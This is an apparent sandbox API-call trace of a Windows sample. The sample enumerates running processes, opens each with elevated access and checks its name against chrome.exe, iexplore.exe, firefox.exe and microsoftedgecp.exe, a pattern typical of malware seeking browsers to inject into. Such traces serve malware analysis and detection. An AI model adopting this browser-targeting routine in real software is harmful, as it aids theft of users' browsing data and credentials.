	[0234.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x73a8
	[0234.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.500] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.501] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.504] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.504] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0234.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x73ac
	[0234.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.506] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0234.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.507] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.507] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0234.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.507] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0234.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x73b0
	[0234.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.551] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0234.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.551] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.552] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0234.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.552] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.552] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0234.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x73b4
	[0234.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.553] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0234.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.554] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.554] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0234.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.554] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.554] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0234.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x73b8
	[0234.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.555] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.556] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.556] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.556] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x73bc
	[0234.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.557] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.557] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.558] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.558] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x73c0
	[0234.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.559] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.560] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.560] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.560] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x73c4
	[0234.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.561] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.562] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.579] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.579] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.579] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.580] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x73c8
	[0234.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.580] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.581] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.581] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.581] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x73cc
	[0234.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.582] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.583] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.583] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.583] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x73d0
	[0234.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.584] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.585] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.585] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.585] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x73d4
	[0234.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.586] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.587] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.587] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.587] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0234.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x73d8
	[0234.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0234.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0234.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.590] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x73dc
	[0234.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.591] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.591] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.591] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.592] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.592] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0234.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x73e0
	[0234.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.593] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.593] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.637] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.637] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.638] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x73e4
	[0234.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.638] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.639] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.639] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.639] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x73e8
	[0234.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.641] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.641] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.642] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.642] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x73ec
	[0234.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.643] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.644] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.644] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.644] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0234.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x73f0
	[0234.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.645] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0234.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.646] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.646] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0234.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.646] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0234.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x73f4
	[0234.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.647] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.648] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.648] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.648] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.648] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0234.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x73f8
	[0234.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.649] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0234.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.650] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.650] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0234.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.650] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0234.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0234.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0234.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x73fc
	[0234.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.653] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0234.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.653] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.654] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0234.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.654] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0234.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7400
	[0234.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.658] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0234.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.658] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.658] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0234.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.659] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0234.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7404
	[0234.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.660] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0234.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.660] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.661] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0234.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.661] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0234.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7408
	[0234.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
